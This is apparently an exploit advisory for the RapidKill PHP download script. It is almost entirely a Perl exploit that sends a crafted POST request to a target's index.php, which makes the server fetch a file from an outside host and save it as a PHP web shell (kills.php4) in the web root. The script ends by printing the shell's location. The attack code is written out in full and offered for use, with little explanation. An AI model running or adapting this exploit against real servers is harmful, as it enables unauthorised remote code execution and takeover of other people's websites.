Application : RapidKill Vulnerability Kind : Remote command execute Product Link : http://www.rapidkill.net version : All Versions Affected mail: only_satsat@yahoo.com Author : Black-0ut exploit : #/usr/bin/perl use URI::Escape; use IO::Socket; $ha=$ARGV[0]; $pa=$ARGV[1]; $file="kills.php4"; if (!$ARGV[1]) { print"\n"; print "[+] Coded By Red_Dragon or H3CT0R3 [+]\n"; print "[+] KAYVANIRAN IT AND SECURITY TEAM [+] \n"; print "[+] Persian site: http://www.onhackerline.ir/ [+] \n"; print "[+] English site: http://www.onhackerline.com/ [+] \n"; print "[+] RapidKill [+] \n"; print "[+] Black 0ut Frenzy Team [+] \n"; print "[+] On Hacker Line WhiteHat Team [+] \n"; print "[+] E-mail : nightmare@onhackerline.ir [+] \n"; print"\n"; print "ex : www.ex.com /path/\n"; exit; } uri_escape($com); $sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ha",PeerPort=>"80") || die "[-] Unable to retrieve: $!"; $sendurl = "FileName=".$file."&host=www.edseek.org&path=%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt&referer=http%3A%2F%2Fwww.edseek.org%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt&email=&partSize=&method=tc&proxy=&saveto=/home/webmixi/public_html/rapid&link=http%3A%2F%2Fwww.edseek.org%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt"; $sendlen = length($sendurl); print $sock "POST ".$pa."/index.php HTTP/1.1\n"; print $sock "Host: ".$ha."\n"; print $sock "Connection: close\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Content-Length: ".$sendlen."\n\n"; print $sock $sendurl; print "Creating Shell...Plz W8\n\n"; while($recvd = <$sock>) { print " ".$recvd.""; } print "shell: ".$ha.$pa.$file;